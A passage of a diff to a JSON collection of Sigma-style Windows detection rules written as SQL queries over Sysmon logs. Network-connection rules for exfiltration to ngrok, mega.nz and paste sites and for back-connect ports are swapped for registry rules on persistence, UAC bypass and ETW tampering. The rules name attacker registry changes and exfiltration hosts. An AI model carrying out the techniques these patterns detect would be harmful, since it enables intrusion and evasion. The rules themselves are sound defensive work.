'172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\') AND (User LIKE '%AUTHORI%' ESCAPE '\\' OR User LIKE '%AUTORI%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE 
'0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\')) OR ((DestinationIp LIKE '20.184.%' ESCAPE '\\' OR DestinationIp LIKE '20.185.%' ESCAPE '\\' OR DestinationIp LIKE '20.186.%' ESCAPE '\\' OR DestinationIp LIKE '20.187.%' ESCAPE '\\' OR DestinationIp LIKE '20.188.%' ESCAPE '\\' OR DestinationIp LIKE '20.189.%' ESCAPE '\\' OR DestinationIp LIKE '20.190.%' ESCAPE '\\' OR DestinationIp LIKE '20.191.%' ESCAPE '\\' OR DestinationIp LIKE '23.79.%' ESCAPE '\\' OR DestinationIp LIKE '51.10.%' ESCAPE '\\' OR DestinationIp LIKE '51.103.%' ESCAPE '\\' OR DestinationIp LIKE '51.104.%' ESCAPE '\\' OR DestinationIp LIKE '51.105.%' ESCAPE '\\' OR DestinationIp LIKE '52.239.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\Winlogon\\\\Notify\\\\logon' ESCAPE '\\' AND Details LIKE '%.dll' ESCAPE '\\' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_powershell_network_connection.yml" + "filename": "registry_set_winlogon_notify_key.yml" }, { - "title": "Script Initiated Connection to Non-Local Network", - "id": "992a6cae-db6a-43c8-9cec-76d7195c96fc", - "status": "experimental", - "description": "Detects a script interpreter wscript/cscript opening a network connection to a non-local network. Adversaries may use script to download malicious payloads.", - "author": "frack113, Florian Roth", + "title": "Execution DLL of Choice Using WAB.EXE", + "id": "fc014922-5def-4da9-a0fc-28c973f41bfb", + "status": "test", + "description": "This rule detects that the path to the DLL written in the registry is different from the default one. 
Launched WAB.exe tries to load the DLL from Registry.", + "author": "oscd.community, Natalia Shornikova", "tags": [ - "attack.command_and_control", - "attack.t1105" + "attack.defense_evasion", + "attack.t1218" ], "falsepositives": [ - "Legitimate scripts" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND (Image LIKE '%\\\\wscript.exe' ESCAPE '\\' OR Image LIKE '%\\\\cscript.exe' ESCAPE '\\')) AND NOT (((DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '172.%' ESCAPE '\\' OR DestinationIp LIKE '192.%' ESCAPE '\\' OR DestinationIp LIKE '169.254.%' ESCAPE '\\' OR DestinationIp LIKE '20.%' ESCAPE '\\')) OR ((DestinationIp LIKE '::1%' ESCAPE '\\' OR DestinationIp LIKE '0:0:0:0:0:0:0:1%' ESCAPE '\\' OR DestinationIp LIKE 'fe80:%' ESCAPE '\\' OR DestinationIp LIKE 'fc%' ESCAPE '\\' OR DestinationIp LIKE 'fd%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\Software\\\\Microsoft\\\\WAB\\\\DLLPath' ESCAPE '\\') AND NOT (Details LIKE '\\%CommonProgramFiles\\%\\\\System\\\\wab32.dll' ESCAPE '\\'))" ], - "filename": "net_connection_win_script_wan.yml" + "filename": "registry_set_wab_dllpath_reg_change.yml" }, { - "title": "Potential Compromised 3CXDesktopApp Beaconing Activity - Netcon", - "id": "51eecf75-d069-43c7-9ea2-63f75499edd4", + "title": "Persistence Via Hhctrl.ocx", + "id": "f10ed525-97fe-4fed-be7c-2feecca941b1", "status": "experimental", - "description": "Detects potential beaconing activity to domains related to 3CX 3CXDesktopApp compromise", + "description": "Detects when an attacker modifies the registry value of the \"hhctrl\" to point to a custom binary", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.command_and_control" + "attack.persistence" 
], "falsepositives": [ "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\3CXDesktopApp.exe' ESCAPE '\\' AND (DestinationHostname LIKE '%akamaicontainer.com%' ESCAPE '\\' OR DestinationHostname LIKE '%akamaitechcloudservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azuredeploystore.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinecloud.com%' ESCAPE '\\' OR DestinationHostname LIKE '%azureonlinestorage.com%' ESCAPE '\\' OR DestinationHostname LIKE '%dunamistrd.com%' ESCAPE '\\' OR DestinationHostname LIKE '%glcloudservice.com%' ESCAPE '\\' OR DestinationHostname LIKE '%journalide.org%' ESCAPE '\\' OR DestinationHostname LIKE '%msedgepackageinfo.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageazure.com%' ESCAPE '\\' OR DestinationHostname LIKE '%msstorageboxes.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officeaddons.com%' ESCAPE '\\' OR DestinationHostname LIKE '%officestoragebox.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxcloudeservices.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxphonenetwork.com%' ESCAPE '\\' OR DestinationHostname LIKE '%pbxsources.com%' ESCAPE '\\' OR DestinationHostname LIKE '%qwepoi123098.com%' ESCAPE '\\' OR DestinationHostname LIKE '%sbmsa.wiki%' ESCAPE '\\' OR DestinationHostname LIKE '%sourceslabs.com%' ESCAPE '\\' OR DestinationHostname LIKE '%visualstudiofactory.com%' ESCAPE '\\' OR DestinationHostname LIKE '%zacharryblogs.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE '%\\\\CLSID\\\\{52A2AAAE-085D-4187-97EA-8C30DB990436}\\\\InprocServer32\\\\(Default)%' ESCAPE '\\') AND NOT (Details LIKE 'C:\\\\Windows\\\\System32\\\\hhctrl.ocx' ESCAPE '\\'))" ], - "filename": "net_connection_win_malware_3cx_compromise_beaconing_activity.yml" + "filename": 
"registry_set_hhctrl_persistence.yml" }, { - "title": "Suspicious Typical Malware Back Connect Ports", - "id": "4b89abaa-99fe-4232-afdd-8f9aa4d20382", + "title": "UAC Bypass Abusing Winsat Path Parsing - Registry", + "id": "6597be7b-ac61-4ac8-bef4-d3ec88174853", "status": "test", - "description": "Detects programs that connect to typical malware back connect ports based on statistical analysis from two different sandbox system databases", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects the pattern of UAC Bypass using a path parsing issue in winsat.exe (UACMe 52)", + "author": "Christian Burkard (Nextron Systems)", "tags": [ - "attack.command_and_control", - "attack.t1571" + "attack.defense_evasion", + "attack.privilege_escalation", + "attack.t1548.002" ], "falsepositives": [ "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Initiated = 'true' AND DestinationPort IN ('4443', '2448', '8143', '1777', '1443', '243', '65535', '13506', '3360', '200', '198', '49180', '13507', '6625', '4444', '4438', '1904', '13505', '13504', '12102', '9631', '5445', '2443', '777', '13394', '13145', '12103', '5552', '3939', '3675', '666', '473', '5649', '4455', '4433', '1817', '100', '65520', '1960', '1515', '743', '700', '14154', '14103', '14102', '12322', '10101', '7210', '4040', '9943')) AND NOT ((Image LIKE '%\\\\Program Files%' ESCAPE '\\') OR ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE 
'172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.%' ESCAPE '\\'))))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE '%\\\\Root\\\\InventoryApplicationFile\\\\winsat.exe|%' ESCAPE '\\' AND TargetObject LIKE '%\\\\LowerCaseLongPath' ESCAPE '\\' AND Details LIKE 'c:\\\\users\\\\%' ESCAPE '\\' AND Details LIKE '%\\\\appdata\\\\local\\\\temp\\\\system32\\\\winsat.exe' ESCAPE '\\')" ], - "filename": "net_connection_win_malware_backconnect_ports.yml" + "filename": "registry_set_uac_bypass_winsat.yml" }, { - "title": "Regsvr32 Network Activity", - "id": "c7e91a02-d771-4a6d-a700-42587e0b1095", + "title": "ETW Logging Disabled In .NET Processes - Sysmon Registry", + "id": "bf4fc428-dcc3-4bbd-99fe-2422aeee2544", "status": "test", - "description": "Detects network connections and DNS queries initiated by Regsvr32.exe", - "author": "Dmitriy Lifanov, oscd.community", + "description": "Potential adversaries stopping ETW providers recording loaded .NET assemblies.", + "author": "Roberto Rodriguez (Cyb3rWard0g), OTR (Open Threat Research)", "tags": [ - "attack.execution", - "attack.t1559.001", "attack.defense_evasion", - "attack.t1218.010" + "attack.t1112", + "attack.t1562" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Image LIKE '%\\\\regsvr32.exe' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%SOFTWARE\\\\Microsoft\\\\.NETFramework\\\\ETWEnabled' ESCAPE '\\' AND Details = 'DWORD 
(0x00000000)') OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\COMPlus\\_ETWEnabled' ESCAPE '\\' OR TargetObject LIKE '%\\\\COMPlus\\_ETWFlags' ESCAPE '\\') AND Details IN ('0', 'DWORD (0x00000000)'))))" ], - "filename": "net_connection_win_regsvr32_network_activity.yml" + "filename": "registry_set_dot_net_etw_tamper.yml" }, { - "title": "RDP Over Reverse SSH Tunnel", - "id": "5f699bc5-5446-4a4a-a0b7-5ef2885a3eb4", - "status": "test", - "description": "Detects svchost hosting RDP termsvcs communicating with the loopback address and on TCP port 3389", - "author": "Samir Bousseaden", + "title": "Adwind RAT / JRAT - Registry", + "id": "42f0e038-767e-4b85-9d96-2c6335bad0b5", + "status": "experimental", + "description": "Detects javaw.exe in AppData folder as used by Adwind / JRAT", + "author": "Florian Roth (Nextron Systems), Tom Ueltschi, Jonhnathan Ribeiro, oscd.community", "tags": [ - "attack.command_and_control", - "attack.t1572", - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" - ], - "falsepositives": [ - "Unknown" + "attack.execution", + "attack.t1059.005", + "attack.t1059.007" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\svchost.exe' ESCAPE '\\' AND Initiated = 'true' AND SourcePort = '3389') AND (DestinationIp LIKE '127.%' ESCAPE '\\' OR DestinationIp = '::1'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND EventType = 'SetValue' AND TargetObject LIKE 'HKLM\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Run%' ESCAPE '\\' AND Details LIKE '\\%AppData\\%\\\\Roaming\\\\Oracle\\\\bin\\\\%' ESCAPE '\\')" ], - "filename": "net_connection_win_rdp_reverse_tunnel.yml" + "filename": "registry_set_mal_adwind.yml" }, { - "title": "Excel Network Connections", - "id": "75e33ce3-ae32-4dcc-9aa8-a2a3029d6f84", - "status": "experimental", - "description": "Detects an Excel process 
that opens suspicious network connections to non-private IP addresses, and attempts to cover CVE-2021-42292.\nYou will likely have to tune this rule for your organization, but it is certainly something you should look for and could have applications for malicious activity beyond CVE-2021-42292.\n", - "author": "Christopher Peacock '@securepeacock', SCYTHE '@scythe_io', Florian Roth '@Neo23x0\", Tim Shelton", + "title": "RDP Sensitive Settings Changed", + "id": "3f6b7b62-61aa-45db-96bd-9c31b36b653c", + "status": "test", + "description": "Detects tampering of RDP Terminal Service/Server sensitive settings.\nSuch as allowing unauthorized users access to a system via the 'fAllowUnsolicited' or enabling RDP via 'fDenyTSConnections'...etc\n", + "author": "Samir Bousseaden, David ANDRE, Roberto Rodriguez @Cyb3rWard0g, Nasreddine Bencherchali", "tags": [ - "attack.execution", - "attack.t1203" + "attack.defense_evasion", + "attack.persistence", + "attack.t1112" ], "falsepositives": [ - "You may have to tune certain domains out that Excel may call out to, such as microsoft or other business use case domains.", - "Office documents commonly have templates that refer to external addresses, like sharepoint.ourcompany.com may have to be tuned.", - "It is highly recommended to baseline your activity and tune out common business use cases." 
+ "Some of the keys mentioned here could be modified by an administrator while setting group policy (it should be investigated either way)" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (Image LIKE '%\\\\excel.exe' ESCAPE '\\' AND Initiated = 'true' AND DestinationIsIpv6 = 'false') AND NOT ((DestinationIp LIKE '10.%' ESCAPE '\\' OR DestinationIp LIKE '192.168.%' ESCAPE '\\' OR DestinationIp LIKE '172.16.%' ESCAPE '\\' OR DestinationIp LIKE '172.17.%' ESCAPE '\\' OR DestinationIp LIKE '172.18.%' ESCAPE '\\' OR DestinationIp LIKE '172.19.%' ESCAPE '\\' OR DestinationIp LIKE '172.20.%' ESCAPE '\\' OR DestinationIp LIKE '172.21.%' ESCAPE '\\' OR DestinationIp LIKE '172.22.%' ESCAPE '\\' OR DestinationIp LIKE '172.23.%' ESCAPE '\\' OR DestinationIp LIKE '172.24.%' ESCAPE '\\' OR DestinationIp LIKE '172.25.%' ESCAPE '\\' OR DestinationIp LIKE '172.26.%' ESCAPE '\\' OR DestinationIp LIKE '172.27.%' ESCAPE '\\' OR DestinationIp LIKE '172.28.%' ESCAPE '\\' OR DestinationIp LIKE '172.29.%' ESCAPE '\\' OR DestinationIp LIKE '172.30.%' ESCAPE '\\' OR DestinationIp LIKE '172.31.%' ESCAPE '\\' OR DestinationIp LIKE '127.0.0.1%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((EventType = 'SetValue' AND (TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\') AND TargetObject LIKE '%\\\\Shadow' ESCAPE '\\' AND Details IN ('DWORD (0x00000001)', 'DWORD (0x00000002)', 'DWORD (0x00000003)', 'DWORD (0x00000004)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\%' ESCAPE '\\') AND (TargetObject LIKE '%\\\\fAllowUnsolicited' ESCAPE '\\' OR 
TargetObject LIKE '%\\\\fAllowUnsolicitedFullControl' ESCAPE '\\') AND Details = 'DWORD (0x00000001)')) OR (EventType = 'SetValue' AND (TargetObject LIKE '%\\\\services\\\\TermService\\\\Parameters\\\\ServiceDll%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\WinStations\\\\RDP-Tcp\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%\\\\Control\\\\Terminal Server\\\\InitialProgram%' ESCAPE '\\' OR TargetObject LIKE '%SOFTWARE\\\\Policies\\\\Microsoft\\\\Windows NT\\\\Terminal Services\\\\InitialProgram%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_excel_outbound_network_connection.yml" + "filename": "registry_set_terminal_server_tampering.yml" }, { - "title": "Communication To Ngrok.Io", - "id": "18249279-932f-45e2-b37a-8925f2597670", - "status": "experimental", - "description": "Detects an executable accessing ngrok.io, which could be a sign of forbidden exfiltration of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New File Association Using Exefile", + "id": "44a22d59-b175-4f13-8c16-cbaef5b581ff", + "status": "test", + "description": "Detects the abuse of the exefile handler in new file association. 
Used for bypass of security products.", + "author": "Andreas Hunkeler (@Karneades)", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.defense_evasion" ], "falsepositives": [ - "Legitimate use of ngrok.io" + "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%.ngrok.io' ESCAPE '\\')" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%Classes\\\\.%' ESCAPE '\\' AND Details = 'exefile' AND EventType = 'SetValue')" ], - "filename": "net_connection_win_ngrok_io.yml" + "filename": "registry_set_file_association_exefile.yml" }, { - "title": "Suspicious Outbound RDP Connections", - "id": "ed74fe75-7594-4b4b-ae38-e38e3fd2eb23", - "status": "test", - "description": "Detects Non-Standard Tools Connecting to TCP port 3389 indicating possible lateral movement", - "author": "Markus Neis", + "title": "Persistence Via Disk Cleanup Handler - Autorun", + "id": "d4e2745c-f0c6-4bde-a3ab-b553b3f693cc", + "status": "experimental", + "description": "Detects when an attacker modifies values of the Disk Cleanup Handler in the registry to achieve persistence via autorun.\nThe disk cleanup manager is part of the operating system.\nIt displays the dialog box […] The user has the option of enabling or disabling individual handlers by selecting or clearing their check box in the disk cleanup manager's UI.\nAlthough Windows comes with a number of disk cleanup handlers, they aren't designed to handle files produced by other applications.\nInstead, the disk cleanup manager is designed to be flexible and extensible by enabling any developer to implement and register their own disk cleanup handler.\nAny developer can extend the available disk cleanup services by implementing and registering a disk cleanup handler.\n", + "author": "Nasreddine Bencherchali (Nextron Systems)", 
"tags": [ - "attack.lateral_movement", - "attack.t1021.001", - "car.2013-07-002" + "attack.persistence" ], "falsepositives": [ - "Other Remote Desktop RDP tools", - "Domain controller using dns.exe" + "Unknown" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE ((EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (DestinationPort = '3389' AND Initiated = 'true') AND NOT (((Image LIKE '%\\\\mstsc.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTSApp.exe' ESCAPE '\\' OR Image LIKE '%\\\\RTS2App.exe' ESCAPE '\\' OR Image LIKE '%\\\\RDCMan.exe' ESCAPE '\\' OR Image LIKE '%\\\\ws\\_TunnelService.exe' ESCAPE '\\' OR Image LIKE '%\\\\RSSensor.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManagerFree.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager.exe' ESCAPE '\\' OR Image LIKE '%\\\\RemoteDesktopManager64.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemoteNG.exe' ESCAPE '\\' OR Image LIKE '%\\\\mRemote.exe' ESCAPE '\\' OR Image LIKE '%\\\\Terminals.exe' ESCAPE '\\' OR Image LIKE '%\\\\spiceworks-finder.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSDiscovery.exe' ESCAPE '\\' OR Image LIKE '%\\\\FSAssessment.exe' ESCAPE '\\' OR Image LIKE '%\\\\MobaRTE.exe' ESCAPE '\\' OR Image LIKE '%\\\\chrome.exe' ESCAPE '\\' OR Image LIKE '%\\\\System32\\\\dns.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor.exe' ESCAPE '\\' OR Image LIKE '%\\\\thor64.exe' ESCAPE '\\' OR Image LIKE '%\\\\Passwordstate.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast Software\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\' OR Image LIKE '%\\\\Ranger\\\\SentinelRanger.exe' ESCAPE '\\' OR Image LIKE '%\\\\Avast\\\\AvastSvc.exe' ESCAPE '\\') OR Image LIKE 'C:\\\\Program Files\\\\SplunkUniversalForwarder\\\\bin\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\') OR (Image = '') OR (Image = '')))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND TargetObject LIKE 
'%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\VolumeCaches\\\\%' ESCAPE '\\') AND ((TargetObject LIKE '%\\\\Autorun%' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR ((TargetObject LIKE '%\\\\CleanupString%' ESCAPE '\\' OR TargetObject LIKE '%\\\\PreCleanupString%' ESCAPE '\\') AND (Details LIKE '%cmd%' ESCAPE '\\' OR Details LIKE '%powershell%' ESCAPE '\\' OR Details LIKE '%rundll32%' ESCAPE '\\' OR Details LIKE '%mshta%' ESCAPE '\\' OR Details LIKE '%cscript%' ESCAPE '\\' OR Details LIKE '%wscript%' ESCAPE '\\' OR Details LIKE '%wsl%' ESCAPE '\\' OR Details LIKE '%\\\\Users\\\\Public\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Windows\\\\TEMP\\\\%' ESCAPE '\\' OR Details LIKE '%\\\\Microsoft\\\\Windows\\\\Start Menu\\\\Programs\\\\Startup\\\\%' ESCAPE '\\'))))" ], - "filename": "net_connection_win_susp_rdp.yml" + "filename": "registry_set_disk_cleanup_handler_autorun_persistence.yml" }, { - "title": "Microsoft Binary Suspicious Communication Endpoint", - "id": "e0f8ab85-0ac9-423b-a73a-81b3c7b1aa97", + "title": "Potential Persistence Via GlobalFlags", + "id": "36803969-5421-41ec-b92f-8500f79c23b0", "status": "test", - "description": "Detects an executable in the Windows folder accessing suspicious domains", - "author": "Florian Roth (Nextron Systems)", + "description": "Detects registry persistence technique using the GlobalFlags and SilentProcessExit keys", + "author": "Karneades, Jonhnathan Ribeiro, Florian Roth", "tags": [ - "attack.lateral_movement", - "attack.t1105" + "attack.privilege_escalation", + "attack.persistence", + "attack.defense_evasion", + "attack.t1546.012", + "car.2013-01-002" ], "falsepositives": [ "Unknown" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND (DestinationHostname LIKE '%dl.dropboxusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%.pastebin.com' ESCAPE '\\' OR DestinationHostname LIKE 
'%.githubusercontent.com' ESCAPE '\\' OR DestinationHostname LIKE '%cdn.discordapp.com/attachments/' ESCAPE '\\' OR DestinationHostname LIKE '%mediafire.com' ESCAPE '\\' OR DestinationHostname LIKE '%mega.nz' ESCAPE '\\' OR DestinationHostname LIKE '%ddns.net' ESCAPE '\\' OR DestinationHostname LIKE '%.paste.ee' ESCAPE '\\' OR DestinationHostname LIKE '%.hastebin.com/raw/' ESCAPE '\\' OR DestinationHostname LIKE '%.ghostbin.co/' ESCAPE '\\' OR DestinationHostname LIKE '%ufile.io' ESCAPE '\\' OR DestinationHostname LIKE '%anonfiles.com' ESCAPE '\\' OR DestinationHostname LIKE '%send.exploit.in' ESCAPE '\\' OR DestinationHostname LIKE '%transfer.sh' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.net' ESCAPE '\\' OR DestinationHostname LIKE '%privatlab.com' ESCAPE '\\' OR DestinationHostname LIKE '%sendspace.com' ESCAPE '\\' OR DestinationHostname LIKE '%pastetext.net' ESCAPE '\\' OR DestinationHostname LIKE '%pastebin.pl' ESCAPE '\\' OR DestinationHostname LIKE '%paste.ee' ESCAPE '\\') AND (Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Users\\\\Public\\\\%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE (EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND TargetObject LIKE '%\\\\Microsoft\\\\Windows NT\\\\CurrentVersion\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\Image File Execution Options\\\\%' ESCAPE '\\' AND TargetObject LIKE '%\\\\GlobalFlag%' ESCAPE '\\' AND TargetObject LIKE '%\\\\SilentProcessExit\\\\%' ESCAPE '\\' AND (TargetObject LIKE '%\\\\ReportingMode%' ESCAPE '\\' OR TargetObject LIKE '%\\\\MonitorProcess%' ESCAPE '\\'))" ], - "filename": "net_connection_win_binary_susp_com.yml" + "filename": "registry_set_persistence_globalflags.yml" }, { - "title": "Communication To Ngrok Tunneling Service", - "id": "1d08ac94-400d-4469-a82f-daee9a908849", - "status": "experimental", - "description": "Detects an executable accessing an ngrok tunneling endpoint, which could be a sign of forbidden exfiltration of data 
exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "Registry Modification to Hidden File Extension", + "id": "5df86130-4e95-4a54-90f7-26541b40aec2", + "status": "test", + "description": "Hides the file extension through modification of the registry", + "author": "frack113", "tags": [ - "attack.exfiltration", - "attack.command_and_control", - "attack.t1567", - "attack.t1568.002", - "attack.t1572", - "attack.t1090", - "attack.t1102", - "attack.s0508" + "attack.persistence", + "attack.t1137" ], "falsepositives": [ - "Legitimate use of ngrok" + "Administrative scripts" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND (DestinationHostname LIKE '%tunnel.us.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.eu.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.ap.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.au.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.sa.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.jp.ngrok.com%' ESCAPE '\\' OR DestinationHostname LIKE '%tunnel.in.ngrok.com%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\HideFileExt' ESCAPE '\\' AND Details = 'DWORD (0x00000001)') OR (EventType = 'SetValue' AND TargetObject LIKE '%\\\\SOFTWARE\\\\Microsoft\\\\Windows\\\\CurrentVersion\\\\Explorer\\\\Advanced\\\\Hidden' ESCAPE '\\' AND Details = 'DWORD (0x00000002)')))" ], - "filename": "net_connection_win_ngrok_tunnel.yml" + "filename": "registry_set_hidden_extention.yml" }, { - "title": "Communication To Mega.nz", - "id": "fdeebdf0-9f3f-4d08-84a6-4c4d13e39fe4", - "status": "test", - "description": "Detects an executable accessing mega.co.nz, which could be a 
sign of forbidden file sharing use of data exfiltration by malicious actors", - "author": "Florian Roth (Nextron Systems)", + "title": "New RUN Key Pointing to Suspicious Folder", + "id": "02ee49e2-e294-4d0f-9278-f5b3212fc588", + "status": "experimental", + "description": "Detects suspicious new RUN key element pointing to an executable in a suspicious folder", + "author": "Florian Roth (Nextron Systems), Markus Neis, Sander Wiebing", "tags": [ - "attack.exfiltration", - "attack.t1567.001" + "attack.persistence", + "attack.t1547.001" ], "falsepositives": [ - "Legitimate use of mega.nz uploaders and tools" + "Software using weird folders for updates" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (EventID = '3' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND Initiated = 'true' AND DestinationHostname LIKE '%api.mega.co.nz' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '13' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (EventType = 'SetValue' AND (TargetObject LIKE 